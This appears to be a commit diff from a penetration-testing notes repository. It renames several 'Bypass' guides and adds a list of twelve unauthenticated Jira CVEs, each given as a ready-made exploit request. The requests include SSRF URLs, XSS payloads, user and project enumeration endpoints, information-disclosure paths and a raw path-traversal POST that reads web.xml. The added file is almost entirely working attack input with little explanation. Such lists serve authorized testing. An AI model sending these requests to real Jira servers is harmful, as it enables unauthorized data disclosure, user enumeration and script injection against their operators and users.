Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
-
Bypass 2FA.md Bypass/Bypass 2FA.mdContent is identical
-
Bypass 403.md Bypass/Bypass 403.mdContent is identical
-
Bypass CSRF.md Bypass/Bypass CSRF.mdContent is identical
-
Bypass Captcha.md Bypass/Bypass Captcha.mdContent is identical
-
Bypass File Upload.md Bypass/Bypass File Upload.mdContent is identical
-
Bypass Rate Limit.md Bypass/Bypass Rate Limit.mdContent is identical
-
-
1 + # Unauthenticated Jira CVEs 2 + 1. CVE-2017-9506 (SSRF) 3 + ``` 4 + https://<JIRA_URL>/plugins/servlet/oauth/users/icon-uri?consumerUri=<SSRF_PAYLOAD> 5 + ``` 6 + 2. CVE-2018-20824 (XSS) 7 + ``` 8 + https://<JIRA_URL>/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain) 9 + ``` 10 + 3. CVE-2019-8451 (SSRF) 11 + ``` 12 + https://<JIRA_URL>/plugins/servlet/gadgets/makeRequest?url=https://<HOST_NAME>:[email protected] 13 + ``` 14 + 4. CVE-2019-8449 (User Information Disclosure) 15 + ``` 16 + https://<JIRA_URL>/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true 17 + ``` 18 + 5. CVE-2019-8442 (Sensitive Information Disclosure) 19 + ``` 20 + https://<JIRA_URL>/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml 21 + ``` 22 + 6. CVE-2019-3403 (User Enumeration) 23 + ``` 24 + https://<JIRA_URL>/rest/api/2/user/picker?query=<USERNAME_HERE> 25 + ``` 26 + 7. CVE-2020-14181 (User Enumeration) 27 + ``` 28 + https://<JIRA_URL>/secure/ViewUserHover.jspa?username=<USERNAME> 29 + ``` 30 + 8. CVE-2020-14178 (Project Key Enumeration) 31 + ``` 32 + https://<JIRA_URL>/browse.<PROJECT_KEY> 33 + ``` 34 + 9. CVE-2020-14179 (Information Disclosure) 35 + ``` 36 + https://<JIRA_URL>/secure/QueryComponent!Default.jspa 37 + ``` 38 + 10. CVE-2019-11581 (Template Injection) 39 + ``` 40 + <JIRA_URL>/secure/ContactAdministrators!default.jspa 41 + 42 + * Try the SSTI Payloads 43 + ``` 44 + 45 + 11. CVE-2019-3396 (Path Traversal) 46 + ``` 47 + POST /rest/tinymce/1/macro/preview HTTP/1.1 48 + Host: {{Hostname}} 49 + Accept: */* 50 + Accept-Language: en-US,en;q=0.5 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 51 + Referer: {{Hostname}} 52 + Content-Length: 168 53 + Connection: close 54 + 55 + {"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}} 56 + 57 + *Try above request with the Jira target 58 + ``` 59 + 12. CVE-2019-3402 (XSS) 60 + ``` 61 + https://<JIRA_URL>/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search 62 + ``` -